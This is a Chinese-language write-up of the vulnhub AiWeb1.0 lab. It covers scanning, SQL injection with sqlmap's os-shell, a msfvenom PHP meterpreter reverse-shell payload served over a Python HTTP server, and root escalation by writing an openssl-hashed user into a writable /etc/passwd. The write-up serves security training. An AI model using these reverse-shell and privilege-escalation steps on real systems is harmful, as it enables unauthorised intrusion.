前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >vulnhub-AiWeb1.0

vulnhub-AiWeb1.0

作者头像
用户2616264
发布2023-05-18 11:37:57
3370
发布2023-05-18 11:37:57
举报
文章被收录于专栏:penetrationpenetration

一、靶机信息

代码语言:javascript
复制
Name: AiWeb1.0
靶机下载地址:https://www.vulnhub.com/entry/ai-web-1,353/

二、信息收集

nmap扫描发现主机开放了80端口,打开之后并没有发现有啥可用的

代码语言:javascript
复制
nmap -sV -T4 192.168.23.140
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-05 04:40 EDT
Nmap scan report for 192.168.23.140
Host is up (0.00034s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.84 seconds

目录扫描发现主机下有

代码语言:javascript
复制
dirsearch -u http://192.168.23.140 

访问发现有m3diNf0/和se3reTdir777/uploads/目录存在继续对着两个目录进行扫描,在/m3diNf0/下发现了/info.php发现了网页的绝对路径,除此之外就没有其他可用信息 .接下来在 se3reTdir777下发现了一个输入框

三、漏洞利用

经过测试输入框存在sql注入,利用sqlmap的–os-shell命令进行反弹shell。sqlmap --os-shell执行原理

成功反弹shell但是权限比较低。利用sqlmap写入的文件进行上传马子。使用python2搭建一个简单的服务器,将马子下载到靶机中,并执行上线。

代码语言:javascript
复制
msfvenom -p php/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.23.128 -f raw > shell.php
代码语言:javascript
复制
python2 -m SimpleHTTPServer 8888

先使用python转换成交互式shell,这样看着更舒服

代码语言:javascript
复制
python3 -c 'import pty;pty.spawn("/bin/bash")'

发现当前用户不是root用户但是这个用户可以对/etc/passwd 文件进行写入权限,这里我们利用openssl写入一个拥有root的用户

代码语言:javascript
复制
└─$ openssl passwd -1 -salt web 123456
$1$web$dNUtM8dpCeSA69y9NoHCf.

查看权限,已经是root权限,并且成功拿取到flag

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2023-04-05 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 一、靶机信息
  • 二、信息收集
  • 三、漏洞利用
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档